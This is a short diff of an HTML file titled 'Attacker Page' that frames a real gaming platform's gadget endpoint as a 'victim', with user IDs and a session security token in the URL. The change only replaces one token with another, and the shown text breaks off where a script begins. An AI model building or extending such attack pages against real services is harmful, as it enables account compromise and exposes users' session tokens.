--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=MY%2B9I0R1%2Fk%2Bt7xkov%2BqK1ZYeKImYUxd17JmI6Lh9zGJQY8odsr6ECOK2EYIlKwAKt9kkKE4Jxe2HfvfTkO8bM31g%2BYDmW%2FFP7h%2FUSlEPCXh%2ByNhdwvBlxyXU%2BXyB2Cek3t6RTLAIWRVhbWCIXjpU4diH6Y0KtvNz%2FFEuj2aADlYlzPXW2PZoE8H9EvYkPQRXgpi1RnGKpXaCv3vCYGLkeXqacdoYDHlr9%2B1CRuRccHvXAWnl8urFyq53%2FufwjZtB%2FrBF%2FAs6uNSUYN6Nk4%2Fb05ZIztc%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=ZyG5F753v7TnNbigBcMMf4C0GLa6xYZaQ0cMSO1cmJqSWcmXtQVxzQrJ9oCVlZ4xc%2FdmF7D%2Fq%2BlTHEs%2B8b9GLj%2F8Tw72bmpa4NK1raA%2BMTj%2FtTNbwJ3k6KCxpG%2BNYAsX8a9Kj4nDj6pbf8yRkSBkxQvKmEazrsZDC0hp9h%2BiS64afmqmC4gy9v5Yn%2F%2BllEcyfbafNcP%2Bo0G2OV6WwIIblWSBO5wMAe%2F6T9W4j%2FxuMLByNRUPFIRjXRIkhJDNCqwZwMtrBZPzH%2F5cggZId3817CEFi4c%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
